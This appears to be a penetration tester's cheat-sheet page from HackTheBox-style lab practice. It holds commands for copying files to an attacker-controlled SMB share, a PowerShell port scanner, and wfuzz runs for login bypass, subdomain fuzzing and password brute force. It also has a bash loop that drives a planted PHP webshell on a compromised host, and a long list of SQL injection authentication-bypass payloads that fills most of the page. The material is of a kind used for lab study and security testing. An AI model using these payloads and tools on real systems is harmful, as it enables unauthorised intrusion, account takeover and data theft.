Miscellaneous
Here I’ll show some examples of miscellaneous tools and commands that I common use.
Summary
File Transfer
Commands used to make file transfer between boxes
Windows File Transfer
You can make a file transfer using samba share from impacket and powershell, and then easily get and send files to the remote server
On Windows Box
$pass = convertto-securestring '123456' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('0x4rt3mis', $pass)
On Kali Box we start the impacket smb server
1
impacket-smbserver kalishare . -username 0x4rt3mis -password 123456
Now we enable the samba share on Windows
New-PSDrive kalishare -PSProvider FileSystem -Credential $cred -Root \\10.10.16.5\kalishare
Or
net use \\10.10.16.5\kalishare /u:0x4rt3mis 123456
cp archive.zip \\10.10.16.5\kalishare
Commands
Let’s jump in.
Powershell
Get the size of folders
Get-ChildItem -Recurse 'C:\inetpub\wwwroot' | Measure-Object -Property Length -Sum
Zip Folder
Compress-Archive -Path .\htdocs -DestinationPath archive.zip
Port Scan
8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("ip",$_)) "Port $_ is open!"} 2>$null
Gobuster
1
gobuster dir -u http://x.x.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30
Wfuzz
Login Bypass
1
wfuzz -z file,list.txt -d "username=adminFUZZ&password=admin" --hc 200 http://10.10.10.185/login.php
Vhost Fuzzing
1
wfuzz -u http://10.10.10.208 -H "Host: FUZZ.crossfit.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 10701
Password Bruteforce
1
wfuzz -c -z file,common.txt --hh 18170 -d "Action=Login&RequestedURL=Action%3DAdmin&Lang=en&TimeOffset=240&User=root@localhost&Password=FUZZ" http://192.168.8.9/admin.php
Bash Misc
Find
1
find . -type f -newermt 2018-12-19 ! -newermt 2018-12-21 -ls
Grep Awesome
1
grep -l -R -e "\$_GET\['doc'\]" $(grep -l -R -e "\$_GET\['app'\]" `grep -l -R -e vqmods`)
Small ssh key
1
ssh-keygen -t ed25519 -f 0x4rt3mis
Pseudo WebShell PHP
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash
# 0x4rt3mis
# Shell "pseudo" - Compromissed HackTheBox
echo "exit for exit"
input=""
while [ "$input" != "exit" ]
do
echo -n "> "
read input
curl -GET http://10.10.10.207/shop/vqmod/xml/payload.php --data-urlencode "cmd=$input"
done
Python Virtual Env
1
2
3
virtualenv -p python2.7 exploit
cd exploit
source bin/activate
Wordlist Auth Bypass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
" "
" #
" --
"&"
"*"
"-"
"/*
"^"
'
' #
' '
' -
' --
'#
'&'
'*'
'-'
'--
'/*
'^'
=
==
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1?) and '1?='1-
admin" #
admin" --
admin"/*
admin' #
admin' --
admin'/*
admin' and substring(password/text(),1,1)='7
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin"or 1=1 or ""="
admin'or 1=1 or ''='
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
and 1=1
and 1=1-
' and 1='1
' and a='a
' and 'one'='one
' and 'one'='one-
' and substring(password/text(),1,1)='7
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""="
" or ""^"
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''='
' or ''^'
'="or'
or 0=0 #
or 0=0 -
or 0=0 --
" or 0=0 #
" or 0=0 -
" or 0=0 --
%' or '0'='0
' or 0=0 #
' or 0=0 #
' or 0=0 -
' or 0=0 --
or 1=1
or 1=1#
or 1=1-
or 1=1--
or 1=1/*
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or 1=1
" or 1=1 -
" or 1=1 --
" or 1=1#
" or 1=1-
" or 1=1--
" or 1=1/*
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1?='1
' or 1=1
' or 1=1 -
' or 1=1 --
' or 1=1#
' or 1=1-
' or 1=1--
' or 1=1/*
' or 1=1;#
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
'or'1=1
'or'1=1?
) or '1?='1-
) or ('1?='1-
or 1=1
or 1=1#
or 1=1--
or 1=1/*
'OR 1=1--
' or 1=1 limit 1 -- -+
' or 1=1 LIMIT 1;#
"or 1=1 or ""="
'or 1=1 or ''='
" or "a"="a
") or ("a"="a
' or 'a'='a
' or a=a-
' or a=a--
') or ('a'='a
') or ('a'='a and hi") or ("a"="a
'OR '' = ' Allows authentication without a valid username.
'=' 'or' and '=' 'or'
' or 'one'='one
' or 'one'='one-
or true
" or true--
") or true--
' or true--
') or true--
or true--
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 'x'='x
') or ('x')=('x
') or ('x'='x
')) or (('x'))=(('x
' OR 'x'='x'#;
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
' UNION select table_schema,table_name FROM information_Schema.tables;#
<username>'--
<username>' OR 1=1--
Apt Proxy
1
2
ssh -g -D 8000 kali@127.0.0.1
echo "Acquire::http::proxy \"socks5h://server:8000\";" > /etc/apt/apt.conf